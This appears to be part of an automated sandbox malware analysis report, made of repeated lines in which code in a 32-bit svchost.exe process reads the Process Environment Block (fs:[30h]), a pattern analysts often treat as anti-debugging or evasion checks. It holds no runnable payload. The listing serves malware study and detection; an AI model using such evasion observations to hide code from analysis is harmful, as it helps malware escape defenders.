            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h] | 1_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] | 1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] | 1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] | 1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] | 1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] | 1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] | 1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] | 1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] | 1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]1_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]1_2_03CD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]1_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]1_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]1_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]1_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]1_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]1_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]1_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]1_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]1_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]1_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
